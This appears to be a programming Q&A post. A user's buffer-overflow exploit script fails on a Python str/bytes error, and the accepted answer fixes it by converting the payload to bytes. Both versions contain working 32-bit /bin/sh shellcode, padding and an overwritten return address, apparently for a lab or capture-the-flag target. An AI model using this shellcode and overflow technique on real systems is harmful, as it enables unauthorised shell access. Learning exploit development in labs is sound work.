# Struct pack fails with string and integer input

Tags: python, struct

I have a program that provides some input to another program.

It looks like this

```
from pwn import *
import struct
# buffer \xb0\xc9\xff\xff'
print(p32(0xffffc9b0))

size = 268


payload = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" \
          "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" \
          "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"      

payload += "A" * (size-len(payload))

payload += struct.pack("I", 0xffffc9b0)

print(payload)
```

When I run it, I get this error:

```
  File "exploit.py", line 16, in <module>
    payload += struct.pack("I", 0xffffc9b0)
TypeError: can only concatenate str (not "bytes") to str
```

and it has something to do with the types going into the pack() function.
When I look at the docs for pack, it looks like this:

```
>>> from struct import *
>>> pack('hhl', 1, 2, 3)
```

this seems like it should work. perhaps it has something to do with the amount of arguments?

Can someone help me with what I am trying to achieve here?

Answer (score 0, accepted):

You are misdiagnosing the problem - the error does not happen during the `struct.pack` call, but when you try to concatenate the result of that call to the `payload` variable.

The error message is telling you the problem. You initially define your payload as a [string](https://docs.python.org/3/library/stdtypes.html#text-sequence-type-str), but the result of the `struct.pack` call is a [bytes](https://docs.python.org/3/library/stdtypes.html#bytes-objects) object. You can't concatenate bytes to strings.

Probably, you want to define the original payload as a bytes object, like this:

```
from pwn import *
import struct

size = 268
payload = (
    b"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
    b"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
    b"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
)
payload += b"A" * (size - len(payload))
payload += struct.pack("I", 0xffffc9b0)
print(payload)
```